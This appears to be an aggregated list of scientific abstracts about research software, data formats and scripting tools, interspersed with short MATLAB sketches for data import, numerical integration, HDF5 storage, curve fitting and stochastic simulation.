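The toolbox's own data-structure API is not reproduced in this record; the sketch below only illustrates, in plain MATLAB, the kind of import-plus-quality-control step described above: read a delimited logger export, apply a range rule, and keep the qualifier flags alongside the data. The file name, column name, and range limits are hypothetical.

% Sketch: import a delimited logger file and apply a simple QC range rule.
T = readtable('mooring_export.csv');           % hypothetical delimited export
loRange = 0; hiRange = 40;                     % assumed limits for water temp [deg C]
flags = repmat("", height(T), 1);              % one qualifier flag per record
bad = T.Temperature < loRange | T.Temperature > hiRange;
flags(bad) = "Q";                              % 'questionable' qualifier
T.Temperature_flag = flags;                    % keep flags alongside the data
fprintf('%d of %d records flagged by the range rule\n', nnz(bad), height(T));
writetable(T, 'mooring_qc.csv');               % export data + qualifiers together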
NCL script: cmaq_ensemble_isam_4panels_subdomain.ncl
Netcdf input file for NCL script, containing ensemble means and standard deviation of ISAM SO4 and O3 contributions from IPM: test.nc
Plot (ps): maps_isam_mean_std_lasthour_ipm_so4_o3_east.ps
Plot (pdf): maps_isam_mean_std_lasthour_ipm_so4_o3_east.pdf
Plot (ncgm): maps_isam_mean_std_lasthour_ipm_so4_o3_east.ncgm
This dataset is associated with the following publication: Gilliam, R., C. Hogrefe, J. Godowitch, S. Napelenok, R. Mathur, and S.T. Rao. Impact of inherent meteorology uncertainty on air quality model predictions. JOURNAL OF GEOPHYSICAL RESEARCH-ATMOSPHERES. American Geophysical Union, Washington, DC, USA, 120(23): 12,259–12,280, (2015).
NASA Astrophysics Data System (ADS)
Tomesh, Trevor; Price, Colin
2011-03-01
Using the scripting language for the Unreal Tournament 2004 Engine, Unreal Script, demonstrations in the field of oscillations and waves were designed and developed. Variations on Euler's method and the Runge-Kutta method were used to numerically solve the equations of motion for seven different physical systems which were visually represented in the immersive environment of Unreal Tournament 2004. Data from each system was written to an output file, plotted and analyzed. The over-arching goal of this research is to successfully design and develop useful teaching tools for the k-12 and undergraduate classroom which, presented in the form of a video game, is immersive, engaging and educational.
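The demonstrations themselves were written in UnrealScript; the same comparison of Euler's method against a Runge-Kutta step can be sketched compactly in MATLAB for a simple mass-on-a-spring, which is the kind of oscillating system the abstract describes. The step size and parameters below are arbitrary choices.

% Sketch: explicit Euler vs classical RK4 for a simple harmonic oscillator
% x'' = -(k/m) x, written as a first-order system y = [x; v].
k = 1; m = 1; f = @(t, y) [y(2); -(k/m)*y(1)];
h = 0.05; t = 0:h:20; n = numel(t);
yE = zeros(2, n); yR = zeros(2, n);
yE(:,1) = [1; 0]; yR(:,1) = [1; 0];
for i = 1:n-1
    yE(:,i+1) = yE(:,i) + h*f(t(i), yE(:,i));          % Euler slowly gains energy
    k1 = f(t(i),     yR(:,i));
    k2 = f(t(i)+h/2, yR(:,i)+h/2*k1);
    k3 = f(t(i)+h/2, yR(:,i)+h/2*k2);
    k4 = f(t(i)+h,   yR(:,i)+h*k3);
    yR(:,i+1) = yR(:,i) + h/6*(k1 + 2*k2 + 2*k3 + k4); % RK4 stays on the orbit
end
plot(t, yE(1,:), t, yR(1,:), t, cos(t), '--');
legend('Euler', 'RK4', 'exact cos(t)');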
Trick Simulation Environment 07
NASA Technical Reports Server (NTRS)
Lin, Alexander S.; Penn, John M.
2012-01-01
The Trick Simulation Environment is a generic simulation toolkit used for constructing and running simulations. This release includes a Monte Carlo analysis simulation framework and a data analysis package. It produces all auto documentation in XML. Also, the software is capable of inserting a malfunction at any point during the simulation. Trick 07 adds variable server output options and error messaging and is capable of using and manipulating wide characters for international support. Wide character strings are available as a fundamental type for variables processed by Trick. A Trick Monte Carlo simulation uses a statistically generated, or predetermined, set of inputs to iteratively drive the simulation. Also, there is a framework in place for optimization and solution finding where developers may iteratively modify the inputs per run based on some analysis of the outputs. The data analysis package is capable of reading data from external simulation packages such as MATLAB and Octave, as well as the common comma-separated values (CSV) format used by Excel, without the use of external converters. The file formats for MATLAB and Octave were obtained from their documentation sets, and Trick maintains generic file readers for each format. XML tags store the fields in the Trick header comments. For header files, XML tags for structures and enumerations, and the members within, are stored in the auto documentation. For source code files, XML tags for each function and the calling arguments are stored in the auto documentation. When a simulation is built, a top level XML file, which includes all of the header and source code XML auto documentation files, is created in the simulation directory. Trick 07 provides an XML to TeX converter. The converter reads in header and source code XML documentation files and converts the data to TeX labels and tables suitable for inclusion in TeX documents. A malfunction insertion capability allows users to override the value of any simulation variable, or call a malfunction job, at any time during the simulation. Users may specify conditions, use the return value of a malfunction trigger job, or manually activate a malfunction. The malfunction action may consist of executing a block of input file statements in an action block, setting simulation variable values, calling a malfunction job, or turning simulation jobs on or off.
Profex: a graphical user interface for the Rietveld refinement program BGMN.
Doebelin, Nicola; Kleeberg, Reinhard
2015-10-01
Profex is a graphical user interface for the Rietveld refinement program BGMN. Its interface focuses on preserving BGMN's powerful and flexible scripting features by giving direct access to BGMN input files. Very efficient workflows for single or batch refinements are achieved by managing refinement control files and structure files, by providing dialogues and shortcuts for many operations, by performing operations in the background, and by providing import filters for CIF and XML crystal structure files. Refinement results can be easily exported for further processing. State-of-the-art graphical export of diffraction patterns to pixel and vector graphics formats allows the creation of publication-quality graphs with minimum effort. Profex reads and converts a variety of proprietary raw data formats and is thus largely instrument independent. Profex and BGMN are available under an open-source license for Windows, Linux and OS X operating systems.
Profex: a graphical user interface for the Rietveld refinement program BGMN
Doebelin, Nicola; Kleeberg, Reinhard
2015-01-01
Profex is a graphical user interface for the Rietveld refinement program BGMN. Its interface focuses on preserving BGMN’s powerful and flexible scripting features by giving direct access to BGMN input files. Very efficient workflows for single or batch refinements are achieved by managing refinement control files and structure files, by providing dialogues and shortcuts for many operations, by performing operations in the background, and by providing import filters for CIF and XML crystal structure files. Refinement results can be easily exported for further processing. State-of-the-art graphical export of diffraction patterns to pixel and vector graphics formats allows the creation of publication-quality graphs with minimum effort. Profex reads and converts a variety of proprietary raw data formats and is thus largely instrument independent. Profex and BGMN are available under an open-source license for Windows, Linux and OS X operating systems. PMID:26500466
NASA Technical Reports Server (NTRS)
McNab, A. David; woo, Alex (Technical Monitor)
1999-01-01
Portals, an experimental feature of 4.4BSD, extend the file system name space by exporting certain open () requests to a user-space daemon. A portal daemon is mounted into the file name space as if it were a standard file system. When the kernel resolves a pathname and encounters a portal mount point, the remainder of the path is passed to the portal daemon. Depending on the portal "pathname" and the daemon's configuration, some type of open (2) is performed. The resulting file descriptor is passed back to the kernel which eventually returns it to the user, to whom it appears that a "normal" open has occurred. A proxy portalfs file system is responsible for kernel interaction with the daemon. The overall effect is that the portal daemon performs an open (2) on behalf of the kernel, possibly hiding substantial complexity from the calling process. One particularly useful application is implementing a connection service that allows simple scripts to open network sockets. This paper describes the implementation of portals for LINUX 2.0.
DOE Office of Scientific and Technical Information (OSTI.GOV)
Dolan, Daniel H.; Ao, Tommy
The Sandia Data Archive (SDA) format is a specific implementation of the HDF5 (Hierarchical Data Format version 5) standard. The format was developed for storing data in a universally accessible manner. SDA files may contain one or more data records, each associated with a distinct text label. Primitive records provide basic data storage, while compound records support more elaborate grouping. External records allow text/binary files to be carried inside an archive and later recovered. This report documents version 1.0 of the SDA standard. The information provided here is sufficient for reading from and writing to an archive. Although the format was originally designed for use in MATLAB, broader use is encouraged.
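The SDA record layout itself is defined in the cited report; the sketch below only shows, with MATLAB's built-in HDF5 functions, the basic labelled write-and-read round trip that such an archive builds on. The file name, dataset path, and attributes are illustrative assumptions, not the SDA conventions.

% Sketch: labelled data record in an HDF5 file using built-in MATLAB functions.
data = rand(100, 3);
h5create('example_archive.h5', '/record1/data', size(data));  % illustrative path
h5write('example_archive.h5', '/record1/data', data);
h5writeatt('example_archive.h5', '/record1', 'label', 'calibration sweep');
h5writeatt('example_archive.h5', '/record1', 'created', datestr(now));
back = h5read('example_archive.h5', '/record1/data');          % recover the record
h5disp('example_archive.h5');                                  % inspect the layout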
The Open Spectral Database: an open platform for sharing and searching spectral data.
Chalk, Stuart J
2016-01-01
A number of websites make available spectral data for download (typically as JCAMP-DX text files) and one (ChemSpider) that also allows users to contribute spectral files. As a result, searching and retrieving such spectral data can be time consuming, and difficult to reuse if the data is compressed in the JCAMP-DX file. What is needed is a single resource that allows submission of JCAMP-DX files, export of the raw data in multiple formats, searching based on multiple chemical identifiers, and is open in terms of license and access. To address these issues a new online resource called the Open Spectral Database (OSDB) http://osdb.info/ has been developed and is now available. Built using open source tools, using open code (hosted on GitHub), providing open data, and open to community input about design and functionality, the OSDB is available for anyone to submit spectral data, making it searchable and available to the scientific community. This paper details the concept and coding, internal architecture, export formats, Representational State Transfer (REST) Application Programming Interface and options for submission of data. The OSDB website went live in November 2015. Concurrently, the GitHub repository was made available at https://github.com/stuchalk/OSDB/, and is open for collaborators to join the project, submit issues, and contribute code. The combination of a scripting environment (PHPStorm), a PHP Framework (CakePHP), a relational database (MySQL) and a code repository (GitHub) provides all the capabilities to easily develop REST based websites for ingestion, curation and exposure of open chemical data to the community at all levels. It is hoped this software stack (or equivalent ones in other scripting languages) will be leveraged to make more chemical data available for both humans and computers.
Physiographic rim of the Grand Canyon, Arizona: a digital database
Billingsley, George H.; Hampton, Haydee M.
1999-01-01
This Open-File report is a digital physiographic map database. This pamphlet serves to introduce and describe the digital data. There is no paper map included in the Open-File report. The report does include, however, PostScript and PDF format plot files, each containing an image of the map. For those interested in a paper plot of information contained in the database or in obtaining the PostScript plot files, please see the section entitled "For Those Who Don't Use Digital Geologic Map Databases" below. This physiographic map of the Grand Canyon is modified from previous versions by Billingsley and Hendricks (1989), and Billingsley and others (1997). The boundary is drawn approximately along the topographic rim of the Grand Canyon and its tributary canyons between Lees Ferry and Lake Mead (shown in red). Several isolated small mesas, buttes, and plateaus are within this area, which overall encompasses about 2,600 square miles. The Grand Canyon lies within the southwestern part of the Colorado Plateaus of northern Arizona between Lees Ferry, Colorado River Mile 0, and Lake Mead, Colorado River Mile 277. The Colorado River is the corridor for raft trips through the Grand Canyon. Limestone rocks of the Kaibab Formation form most of the north and south rims of the Grand Canyon, and a few volcanic rocks form the north rim of parts of the Uinkaret and Shivwits Plateaus. Limestones of the Redwall Limestone and lower Supai Group form the rim of the Hualapai Plateau area, and Limestones of Devonian and Cambrian age form the boundary rim near the mouth of Grand Canyon at the Lake Mead. The natural physiographic boundary of the Grand Canyon is roughly the area a visitor would first view any part of the Grand Canyon and its tributaries.
National Centers for Environmental Prediction
the number of threads used. HWRF group cannot access Zeus and Jet for real-time data transfers from nodes used.). All single jobs will be run on one rack and will not share with parallel jobs. No official change the group when using tag_rstprod (-g option). autotag_rstprod is a script that tags all files. It
ERIC Educational Resources Information Center
Barber, Jill
2018-01-01
Adaptive Comparative Judgement (ACJ) is an alternative to conventional marking in which the assessor (judge) merely compares two answers and chooses a winner. (Scripts are typically uploaded to the CompareAssess interface as pdf files and are presented side-by-side.) Repeated comparisons and application of the sorting algorithm lead to scripts…
Running High-Throughput Jobs on Peregrine | High-Performance Computing |
unique name (using "name=") and use the task name to create a unique output file name. For runs on and how many tasks to give to each worker at a time using the NITRO_COORD_OPTIONS environment variable. Finally, you start Nitro by executing launch_nitro.sh. Sample Nitro job script To run a job using the
Bringing Control System User Interfaces to the Web
DOE Office of Scientific and Technical Information (OSTI.GOV)
Chen, Xihui; Kasemir, Kay
With the evolution of web based technologies, especially HTML5 [1], it becomes possible to create web-based control system user interfaces (UI) that are cross-browser and cross-device compatible. This article describes two technologies that facilitate this goal. The first one is the WebOPI [2], which can seamlessly display CSS BOY [3] Operator Interfaces (OPI) in web browsers without modification to the original OPI file. The WebOPI leverages the powerful graphical editing capabilities of BOY and provides the convenience of re-using existing OPI files. On the other hand, it uses generic JavaScript and a generic communication mechanism between the web browser and web server. It is not optimized for a control system, which results in unnecessary network traffic and resource usage. Our second technology is the WebSocket-based Process Data Access (WebPDA) [4]. It is a protocol that provides efficient control system data communication using WebSocket [5], so that users can create web-based control system UIs using standard web page technologies such as HTML, CSS and JavaScript. WebPDA is control system independent, potentially supporting any type of control system.
CancerNet redistribution via WWW.
Quade, G; Püschel, N; Far, F
1996-01-01
CancerNet from the National Cancer Institute contains nearly 500 ASCII-files, updated monthly, with up-to-date information about cancer and the "Golden Standard" in tumor therapy. Perl scripts are used to convert these files to HTML-documents. A complex algorithm, using regular expression matching and extensive exception handling, detects headlines, listings and other constructs of the original ASCII-text and converts them into their HTML-counterparts. A table of contents is also created during the process. The resulting files are indexed for full-text search via WAIS. Building the complete CancerNet WWW redistribution takes less than two hours with a minimum of manual work. For 26,000 requests for information from our service per month, the average cost for the worldwide delivery of one document is about 19 cents.
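The production system described above uses Perl; a toy version of the same regular-expression-driven conversion can be sketched in MATLAB with regexprep, assuming a hypothetical input file and deliberately simplified rules (real headline and list detection is more involved, as the abstract notes).

% Sketch: convert a plain ASCII document to minimal HTML with regular expressions.
txt = fileread('statement.txt');                              % hypothetical input file
txt = regexprep(txt, '&', '&amp;');                           % escape markup characters first
txt = regexprep(txt, '<', '&lt;');
% An ALL-CAPS line becomes a headline (simplified stand-in for the real rules).
txt = regexprep(txt, '^([A-Z][A-Z \d:,-]{4,})$', '<h2>$1</h2>', 'lineanchors');
% Lines starting with "- " or "* " become list items.
txt = regexprep(txt, '^[-*] +(.*)$', '<li>$1</li>', 'lineanchors');
% Blank-line separated blocks become paragraphs.
txt = regexprep(txt, '(\r?\n){2,}', sprintf('\n<p>\n'));
fid = fopen('statement.html', 'w');
fprintf(fid, '<html><body>\n%s\n</body></html>\n', txt);
fclose(fid);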
MATLAB as an incentive for student learning of skills
NASA Astrophysics Data System (ADS)
Bank, C. G.; Ghent, R. R.
2016-12-01
Our course "Computational Geology" takes a holistic approach to student learning by using MATLAB as a focal point to increase students' computing, quantitative reasoning, data analysis, report writing, and teamwork skills. The course, taught since 2007 with recent enrollments around 35 and aimed at 2nd to 3rd-year students, is required for the Geology and Earth and Environmental Systems major programs, and can be chosen as elective in our other programs, including Geophysics. The course is divided into five projects: Pacific plate velocity from the Hawaiian hotspot track, predicting CO2 concentration in the atmosphere, volume of Earth's oceans and sea-level rise, comparing wind directions for Vancouver and Squamish, and groundwater flow. Each project is based on real data, focuses on a mathematical concept (linear interpolation, gradients, descriptive statistics, differential equations) and highlights a programming task (arrays, functions, text file input/output, curve fitting). Working in teams of three, students need to develop a conceptual model to explain the data, and write MATLAB code to visualize the data and match it to their conceptual model. The programming is guided, and students work individually on different aspects (for example: reading the data, fitting a function, unit conversion) which they need to put together to solve the problem. They then synthesize their thought process in a paper. Anecdotal evidence shows that students continue using MATLAB in other courses.
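As a concrete flavour of the guided programming tasks listed above (text file input, curve fitting, visualization), a short MATLAB fragment in the spirit of the CO2 project might look like the following; the data file name and column layout are hypothetical, and readmatrix requires R2019a or later.

% Sketch: read a two-column text file of CO2 observations and fit a trend.
M = readmatrix('co2_monthly.txt');        % hypothetical file: [decimal year, ppm]
t = M(:,1); c = M(:,2);
p = polyfit(t - t(1), c, 2);              % quadratic trend, shifted for conditioning
tFuture = (t(1):1/12:t(end)+20)';         % extend two decades past the record
plot(t, c, '.', tFuture, polyval(p, tFuture - t(1)), '-');
xlabel('Year'); ylabel('CO_2 concentration (ppm)');
legend('observations', 'quadratic fit', 'Location', 'northwest');
fprintf('Predicted concentration in %d: %.1f ppm\n', ...
    round(t(end))+20, polyval(p, t(end)+20 - t(1)));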
DataPflex: a MATLAB-based tool for the manipulation and visualization of multidimensional datasets.
Hendriks, Bart S; Espelin, Christopher W
2010-02-01
DataPflex is a MATLAB-based application that facilitates the manipulation and visualization of multidimensional datasets. The strength of DataPflex lies in the intuitive graphical user interface for the efficient incorporation, manipulation and visualization of high-dimensional data that can be generated by multiplexed protein measurement platforms including, but not limited to Luminex or Meso-Scale Discovery. Such data can generally be represented in the form of multidimensional datasets [for example (time x stimulation x inhibitor x inhibitor concentration x cell type x measurement)]. For cases where measurements are made in a combinational fashion across multiple dimensions, there is a need for a tool to efficiently manipulate and reorganize such data for visualization. DataPflex accepts data consisting of up to five arbitrary dimensions in addition to a measurement dimension. Data are imported from a simple .xls format and can be exported to MATLAB or .xls. Data dimensions can be reordered, subdivided, merged, normalized and visualized in the form of collections of line graphs, bar graphs, surface plots, heatmaps, IC50's and other custom plots. Open source implementation in MATLAB enables easy extension for custom plotting routines and integration with more sophisticated analysis tools. DataPflex is distributed under the GPL license (http://www.gnu.org/licenses/) together with documentation, source code and sample data files at: http://code.google.com/p/datapflex. Supplementary data available at Bioinformatics online.
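DataPflex's own GUI and .xls import are not shown in this record; the sketch below only illustrates the underlying idea of reordering and slicing a multidimensional measurement array with core MATLAB, using a made-up four-dimensional example.

% Sketch: reorder and visualize a slice of a multidimensional measurement array.
% Hypothetical dimensions: time x stimulation x inhibitor concentration x cell type.
data = rand(8, 3, 6, 2);                         % made-up measurements
data = permute(data, [3 1 2 4]);                 % reorder: conc x time x stim x cell
slab = squeeze(data(:, :, 2, 1));                % stimulation #2, cell type #1
imagesc(slab); colorbar
xlabel('Time point'); ylabel('Inhibitor concentration index');
title('Response surface for one stimulation / cell type combination');
meanOverTime = squeeze(mean(data, 2));           % collapse the time dimension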
Automatic Command Sequence Generation
NASA Technical Reports Server (NTRS)
Fisher, Forest; Gladded, Roy; Khanampompan, Teerapat
2007-01-01
Automatic Sequence Generator (Autogen) Version 3.0 software automatically generates command sequences for the Mars Reconnaissance Orbiter (MRO) and several other JPL spacecraft operated by the multi-mission support team. Autogen uses standard JPL sequencing tools like APGEN, ASP, SEQGEN, and the DOM database to automate the generation of uplink command products, Spacecraft Command Message Format (SCMF) files, and the corresponding ground command products, DSN Keywords Files (DKF). Autogen supports all the major multi-mission mission phases including the cruise, aerobraking, mapping/science, and relay mission phases. Autogen is a Perl script, which functions within the mission operations UNIX environment. It consists of two parts: a set of model files and the autogen Perl script. Autogen encodes the behaviors of the system into a model and encodes algorithms for context sensitive customizations of the modeled behaviors. The model includes knowledge of different mission phases and how the resultant command products must differ for these phases. The executable software portion of Autogen, automates the setup and use of APGEN for constructing a spacecraft activity sequence file (SASF). The setup includes file retrieval through the DOM (Distributed Object Manager), an object database used to store project files. This step retrieves all the needed input files for generating the command products. Depending on the mission phase, Autogen also uses the ASP (Automated Sequence Processor) and SEQGEN to generate the command product sent to the spacecraft. Autogen also provides the means for customizing sequences through the use of configuration files. By automating the majority of the sequencing generation process, Autogen eliminates many sequence generation errors commonly introduced by manually constructing spacecraft command sequences. Through the layering of commands into the sequence by a series of scheduling algorithms, users are able to rapidly and reliably construct the desired uplink command products. With the aid of Autogen, sequences may be produced in a matter of hours instead of weeks, with a significant reduction in the number of people on the sequence team. As a result, the uplink product generation process is significantly streamlined and mission risk is significantly reduced. Autogen is used for operations of MRO, Mars Global Surveyor (MGS), Mars Exploration Rover (MER), Mars Odyssey, and will be used for operations of Phoenix. Autogen Version 3.0 is the operational version of Autogen including the MRO adaptation for the cruise mission phase, and was also used for development of the aerobraking and mapping mission phases for MRO.
Free software helps map and display data
NASA Astrophysics Data System (ADS)
Wessel, Paul; Smith, Walter H. F.
When creating camera-ready figures, most scientists are familiar with the sequence of raw data → processing → final illustration and with the spending of large sums of money to finalize papers for submission to scientific journals, prepare proposals, and create overheads and slides for various presentations. This process can be tedious and is often done manually, since available commercial or in-house software usually can do only part of the job.To expedite this process, we introduce the Generic Mapping Tools (GMT), which is a free, public domain software package that can be used to manipulate columns of tabular data, time series, and gridded data sets and to display these data in a variety of forms ranging from simple x-y plots to maps and color, perspective, and shaded-relief illustrations. GMT uses the PostScript page description language, which can create arbitrarily complex images in gray tones or 24-bit true color by superimposing multiple plot files. Line drawings, bitmapped images, and text can be easily combined in one illustration. PostScript plot files are device-independent, meaning the same file can be printed at 300 dots per inch (dpi) on an ordinary laserwriter or at 2470 dpi on a phototypesetter when ultimate quality is needed. GMT software is written as a set of UNIX tools and is totally self contained and fully documented. The system is offered free of charge to federal agencies and nonprofit educational organizations worldwide and is distributed over the computer network Internet.
Tool for Statistical Analysis and Display of Landing Sites
NASA Technical Reports Server (NTRS)
Wawrzyniak, Geoffrey; Kennedy, Brian; Knocke, Philip; Michel, John
2006-01-01
MarsLS is a software tool for analyzing statistical dispersion of spacecraft-landing sites and displaying the results of its analyses. Originally intended for the Mars Explorer Rover (MER) mission, MarsLS is also applicable to landing sites on Earth and non-MER sites on Mars. MarsLS is a collection of interdependent MATLAB scripts that utilize the MATLAB graphical-user-interface software environment to display landing-site data (see figure) on calibrated image-maps of the Martian or other terrain. The landing-site data comprise latitude/longitude pairs generated by Monte Carlo runs of other computer programs that simulate entry, descent, and landing. Using these data, MarsLS can compute a landing-site ellipse, a standard means of depicting the area within which the spacecraft can be expected to land with a given probability. MarsLS incorporates several features for the user's convenience, including capabilities for drawing lines and ellipses, overlaying kilometer or latitude/longitude grids, drawing and/or specifying lines and/or points, entering notes, defining and/or displaying polygons to indicate hazards or areas of interest, and evaluating hazardous and/or scientifically interesting areas. As part of such an evaluation, MarsLS can compute the probability of landing in a specified polygonal area.
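MarsLS itself is not distributed with this record, but the core calculation it performs, fitting a probability ellipse to Monte Carlo landing points, can be sketched from the sample covariance. The sketch below uses synthetic latitude/longitude samples, assumes the dispersion is small enough to treat them as planar coordinates, and hardcodes the 99% scale factor for a 2-D Gaussian; it is not the MarsLS implementation.

% Sketch: 99% landing ellipse from Monte Carlo latitude/longitude samples.
% Assumes a small, locally planar dispersion; lat/lon in degrees.
pts = randn(5000, 2) * [0.08 0.02; 0.00 0.03] + [18.45 -77.45];  % synthetic samples
mu = mean(pts);
C  = cov(pts);
[V, D] = eig(C);                         % principal axes of the dispersion
s = sqrt(9.2103);                        % sqrt of the 99% chi-square quantile, 2 dof
th = linspace(0, 2*pi, 200);
ell = (V * (s * sqrt(D)) * [cos(th); sin(th)])' + mu;   % ellipse boundary points
plot(pts(:,2), pts(:,1), '.', ell(:,2), ell(:,1), 'r');
xlabel('Longitude (deg)'); ylabel('Latitude (deg)');
inFrac = mean(sum(((pts - mu) / chol(C)) .^ 2, 2) <= s^2);   % empirical coverage
title(sprintf('%.1f%% of samples fall inside the ellipse', 100 * inFrac));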
Efficient simulation of intrinsic, extrinsic and external noise in biochemical systems
Pischel, Dennis; Sundmacher, Kai; Flassig, Robert J.
2017-01-01
Motivation: Biological cells operate in a noisy regime influenced by intrinsic, extrinsic and external noise, which leads to large differences of individual cell states. Stochastic effects must be taken into account to characterize biochemical kinetics accurately. Since the exact solution of the chemical master equation, which governs the underlying stochastic process, cannot be derived for most biochemical systems, approximate methods are used to obtain a solution. Results: In this study, a method to efficiently simulate the various sources of noise simultaneously is proposed and benchmarked on several examples. The method relies on the combination of the sigma point approach to describe extrinsic and external variability and the τ-leaping algorithm to account for the stochasticity due to probabilistic reactions. The comparison of our method to extensive Monte Carlo calculations demonstrates an immense computational advantage while losing an acceptable amount of accuracy. Additionally, the application to parameter optimization problems in stochastic biochemical reaction networks is shown, which is rarely applied due to its huge computational burden. To give further insight, a MATLAB script is provided including the proposed method applied to a simple toy example of gene expression. Availability and implementation: MATLAB code is available at Bioinformatics online. Contact: flassig@mpi-magdeburg.mpg.de Supplementary information: Supplementary data are available at Bioinformatics online. PMID:28881987
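The authors provide their own MATLAB script as supplementary material; the fragment below is only a minimal, independent sketch of the τ-leaping idea for a one-gene birth-death model (constant transcription, first-order degradation). It requires poissrnd from the Statistics and Machine Learning Toolbox, and the rate constants are arbitrary.

% Sketch: tau-leaping for a birth-death model of mRNA copy number.
% Reactions: 0 -> mRNA (rate kOn), mRNA -> 0 (rate kOff * x).
kOn = 10; kOff = 0.1;            % arbitrary rate constants
tau = 0.1; tEnd = 100;           % leap size and time horizon
nSteps = round(tEnd / tau);
x = zeros(nSteps + 1, 1);        % trajectory of copy numbers
for i = 1:nSteps
    aBirth = kOn;                % propensities at the current state
    aDeath = kOff * x(i);
    nBirth = poissrnd(aBirth * tau);          % Poisson-distributed firings per leap
    nDeath = poissrnd(aDeath * tau);
    x(i+1) = max(x(i) + nBirth - nDeath, 0);  % keep the count non-negative
end
plot((0:nSteps) * tau, x);
xlabel('Time'); ylabel('mRNA copies');
yline(kOn / kOff, '--', 'deterministic steady state');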
Baumuratova, Tatiana; Dobre, Simona; Bastogne, Thierry; Sauter, Thomas
2013-01-01
Systems with bifurcations may experience abrupt irreversible and often unwanted shifts in their performance, called critical transitions. For many systems like climate, economy, ecosystems it is highly desirable to identify indicators serving as early warnings of such regime shifts. Several statistical measures were recently proposed as early warnings of critical transitions including increased variance, autocorrelation and skewness of experimental or model-generated data. The lack of an automated tool for model-based prediction of critical transitions led to the design of DyGloSA, a MATLAB toolbox for dynamical global parameter sensitivity analysis (GPSA) of ordinary differential equations models. We suggest that the switch in dynamics of parameter sensitivities revealed by our toolbox is an early warning that a system is approaching a critical transition. We illustrate the efficiency of our toolbox by analyzing several models with bifurcations and predicting the time periods when systems can still avoid going to a critical transition by manipulating certain parameter values, which is not detectable with the existing SA techniques. DyGloSA is based on the SBToolbox2 and contains functions, which compute dynamically the global sensitivity indices of the system by applying four main GPSA methods: eFAST, Sobol's ANOVA, PRCC and WALS. It includes parallelized versions of the functions enabling significant reduction of the computational time (up to 12 times). DyGloSA is freely available as a set of MATLAB scripts at http://bio.uni.lu/systems_biology/software/dyglosa. It requires installation of MATLAB (versions R2008b or later) and the Systems Biology Toolbox2 available at www.sbtoolbox2.org. DyGloSA can be run on Windows and Linux systems, both 32- and 64-bit. PMID:24367574
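DyGloSA wraps several GPSA methods; as a minimal illustration of just one of them, PRCC, the sketch below samples the parameters of a toy two-parameter production/decay model, solves it with ode45, and computes partial rank correlation coefficients with partialcorr (Statistics and Machine Learning Toolbox). It is not the toolbox's interface, and the model and sample size are arbitrary.

% Sketch: PRCC of a model output with respect to sampled parameters.
nSamp = 500;
P = [rand(nSamp,1)*2, rand(nSamp,1)*0.5];          % uniform samples of [k1, k2]
y = zeros(nSamp, 1);
for i = 1:nSamp
    k1 = P(i,1); k2 = P(i,2);
    [~, x] = ode45(@(t, x) k1 - k2*x, [0 10], 0);  % toy production/decay model
    y(i) = x(end);                                 % output: state at final time
end
prcc = zeros(1, size(P, 2));
for j = 1:size(P, 2)
    others = P(:, setdiff(1:size(P,2), j));        % control for remaining parameters
    prcc(j) = partialcorr(P(:, j), y, others, 'Type', 'Spearman');
end
fprintf('PRCC(k1) = %.2f, PRCC(k2) = %.2f\n', prcc(1), prcc(2));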
Scripting MODFLOW Model Development Using Python and FloPy.
Bakker, M; Post, V; Langevin, C D; Hughes, J D; White, J T; Starn, J J; Fienen, M N
2016-09-01
Graphical user interfaces (GUIs) are commonly used to construct and postprocess numerical groundwater flow and transport models. Scripting model development with the programming language Python is presented here as an alternative approach. One advantage of Python is that there are many packages available to facilitate the model development process, including packages for plotting, array manipulation, optimization, and data analysis. For MODFLOW-based models, the FloPy package was developed by the authors to construct model input files, run the model, and read and plot simulation results. Use of Python with the available scientific packages and FloPy facilitates data exploration, alternative model evaluations, and model analyses that can be difficult to perform with GUIs. Furthermore, Python scripts are a complete, transparent, and repeatable record of the modeling process. The approach is introduced with a simple FloPy example to create and postprocess a MODFLOW model. A more complicated capture-fraction analysis with a real-world model is presented to demonstrate the types of analyses that can be performed using Python and FloPy. © 2016, National Ground Water Association.
NASA Technical Reports Server (NTRS)
Chan, Gordon C.
1991-01-01
The new 1991 COSMIC/NASTRAN version, compatible with the older versions, tries to remove some old constraints and make it easier to extract information from the plot file. It also includes some useful improvements and new enhancements. New features available in the 1991 version are described. They include a new PLT1 tape with simplified ASCII plot commands and short records, combined hidden and shrunk plot, an x-y-z coordinate system on all structural plots, element offset plot, improved character size control, improved FIND and NOFIND logic, a new NASPLOT post-processor to perform screen plotting or generate PostScript files, and a BASIC/NASTPLOT program for PC.
Tang, G.; Andre, B.; Hoffman, F. M.; Painter, S. L.; Thornton, P. E.; Yuan, F.; Bisht, G.; Hammond, G. E.; Lichtner, P. C.; Kumar, J.; Mills, R. T.; Xu, X.
2016-04-19
This Modeling Archive is in support of an NGEE Arctic discussion paper under review and available at doi:10.5194/gmd-9-927-2016. The purpose is to document the simulations to allow verification, reproducibility, and follow-up studies. This dataset contains shell scripts to create the CLM-PFLOTRAN cases, specific input files for PFLOTRAN and CLM, outputs, and python scripts to make the figures using the outputs in the publication. Through these results, we demonstrate that CLM-PFLOTRAN can approximately reproduce CLM results in selected cases for Arctic, temperate and tropical sites. In addition, the new framework facilitates mechanistic representations of soil biogeochemistry processes in the land surface model.
NASA Astrophysics Data System (ADS)
Currie, Malcolm J.
This cookbook describes the fundamentals of writing scripts using the UNIX C shell. It shows how to combine Starlink and private applications with shell commands and constructs to create powerful and time-saving tools for performing repetitive jobs, creating data-processing pipelines, and encapsulating useful recipes. The cookbook aims to give practical and reassuring examples to at least get you started without having to consult a UNIX manual. However, it does not offer a comprehensive description of C-shell syntax to prevent you from being overwhelmed or intimidated. The topics covered are: how to run a script, defining shell variables, prompting, arithmetic and string processing, passing information between Starlink applications, obtaining dataset attributes and FITS header information, processing multiple files and filename modification, command-line arguments and options, and loops. There is also a glossary.
PISCES High Contrast Integral Field Spectrograph Simulations and Data Reduction Pipeline
NASA Technical Reports Server (NTRS)
Llop Sayson, Jorge Domingo; Memarsadeghi, Nargess; McElwain, Michael W.; Gong, Qian; Perrin, Marshall; Brandt, Timothy; Grammer, Bryan; Greeley, Bradford; Hilton, George; Marx, Catherine
2015-01-01
